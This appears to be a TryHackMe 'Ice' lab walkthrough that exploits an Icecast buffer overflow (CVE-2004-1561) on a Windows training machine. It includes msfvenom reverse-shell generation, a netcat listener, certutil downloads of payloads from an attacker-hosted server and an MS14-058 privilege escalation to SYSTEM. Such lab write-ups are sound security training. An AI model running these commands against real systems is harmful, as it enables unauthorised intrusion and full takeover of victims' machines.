TryHackme: İce Manual Exploitation
Today we will take a look at TryHackMe: Ice, But Today we are going to use Manual exploitation. My goal in sharing this writeup is to show you How to manually exploit and elevate your privileges in a Windows machine. Please try to understand each step and take notes.
Enumeration/Scanning
Nmap Command:
nmap -sCV -Pn --open -p- -v 10.10.97.184 -oN Nmap:10.10.97.184
Finding Vulnerability and Exploit
- We can see that on Port 8000 you can see Icecast streaming service running. we take a look at cvedetails site this site give detailed information about common Vulnerabilties, and search for Icecast
as we can see Icecast Vulnerable to CVE called 2004–1561, this vulnerability use Buffer overflow and allow us to use Remote Code Execuiton (RCE)
Before using the our Exploit, we will make some minor changes to the code, First we take a look at the icecast.py payload’s code
Here is the command for Shellcode generation that we will use inside the code in Our Terminal we use this command to genereate shell code for our LHOST and LPORT
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=<Your VPN IP> LPORT=<Port you like> -f python -b '\x00\x0a\x0d'
Now We can Modify our payload and replace shellcode with our shellcode
- Note: in shellcode remove character ‘b’ before using it
nano Icecast.py
Using Exploit gaining Shell
- Now it is to time use this exploit to gain revershell from target machine we use 2 Terminals to use this Exploit
- Terminal 1.
We set our Exploit with Traget machine IP
python3 Icecast.py <Target Machine Ip> 8000
- Terminal 2.
We set netcat listener to get our Shell.
nc -lvnp <Port> #LPORT number when you give in mfsvenom command
Privilege Escalation
- Now we Gain access remote Shell now it ist time to Elevate Our Privileges, we use Winpeas and Windows Exploit suggester tools
To Transfer winpeas file to Target Machine we use Certutil
#Deploying Python web server in our terminal
python3 -m http.server <Port> #port is optional in defaul is 8000
#Get data on target machine
certutil -split -urlcache -f "http://<VPN Ip>:<Port>/file"
Note: In Target machine we don’t have permission to get data to bypass this Go to C:\Windows\Tasks folder, in this folder we have Permission get data
we can see basic system information about Target machine, Copy system info in a file we use it with windows exploit suggester
nano systeminfo.txt
Now it is time to find Exploit with Windows exploit suggester
python3 wes.py --update #To update tools database
python3 wes.py systeminfo.txt -e -i "Privilege" #-e -i is use to filter Exploit content
Our Exploit is CVE-2014–4113 this Vulnerability allow us to usent authority/system privileges for limited usage, The Source of this exploit in This Github link name MS14–058
Now it is time to Transfer Our Exploit to The Target Machine
Commands:
Python3 -m http.server 8080
certutil -split -urlcache -f "http://10.9.216.159:8080/Win64.exe" Exploit.exe
When you use Exploit with other command it runs as nt authority/system
To Escalate our Privileges we can use Revershell and run with our Exploit together, First generate our Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Transfer shell exploit to Windows machine
certutil -split -urlcache -f "http://10.9.216.159:8080/shell.exe"
Now It is time to use Our exploit to gain access our elevated privileged shell
In A Second Terminal we listen our port
Now We Are SYSTEM